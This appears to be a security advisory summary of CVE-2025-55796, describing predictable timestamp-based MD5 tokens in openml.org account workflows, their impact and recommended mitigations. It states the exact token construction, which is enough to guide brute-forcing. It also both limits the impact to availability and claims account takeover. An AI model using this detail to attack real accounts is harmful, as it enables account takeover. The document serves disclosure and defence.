CVE-2025-55796 is a high-severity vulnerability in the openml/openml.org web application version v2.0.20241110. The core issue lies in the use of predictable MD5-based tokens for sensitive user workflows including signup confirmation, password resets, email confirmation resends, and email change confirmations. The tokens are generated by hashing only the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific identifiers or cryptographically secure randomness. This design flaw results in a very limited token space that attackers can brute-force remotely within a small time window. Since the tokens are used to authorize critical account actions, successful brute-forcing can lead to unauthorized account confirmation, password resets, and email change approvals, effectively enabling account takeover. The vulnerability does not require any authentication or user interaction, increasing its risk. The CVSS 3.1 score of 7.5 reflects the network attack vector, low attack complexity, no privileges required, and no user interaction needed, but with impact limited to availability (denial of service or account lockout) rather than confidentiality or integrity. No patches or known exploits are currently reported, but the vulnerability demands urgent remediation due to the critical nature of affected workflows.

For European organizations using openml.org or similar vulnerable versions, this vulnerability poses a significant risk of unauthorized account takeovers. Attackers can disrupt user workflows by confirming accounts without consent, resetting passwords, or changing email addresses, potentially leading to loss of access, data manipulation, or denial of service. Organizations relying on openml.org for scientific data sharing, machine learning experiments, or collaborative research may face operational disruptions and reputational damage. The impact is heightened in environments where user accounts have elevated privileges or access to sensitive data. Although the vulnerability primarily affects availability, the indirect consequences on integrity and confidentiality through account compromise are also concerning. The lack of known exploits in the wild suggests limited current exploitation but does not reduce the urgency for mitigation. European entities involved in academia, research institutions, and companies using openml.org are particularly vulnerable.

Immediate mitigation involves replacing the current token generation mechanism with a cryptographically secure random token generator that incorporates user-specific data (e.g., user ID or email) and timestamps to ensure uniqueness and unpredictability. Avoid using MD5 or any hashing of predictable inputs alone. Implement tokens with sufficient entropy and expiration times to limit brute-force windows. Additionally, enforce rate limiting and monitoring on token validation endpoints to detect and block brute-force attempts. Employ multi-factor authentication (MFA) for critical account actions to add an extra security layer. Conduct a thorough audit of all user workflows relying on token-based verification to identify and remediate similar weaknesses. Finally, communicate with users about the vulnerability and encourage password resets and vigilance for suspicious account activity.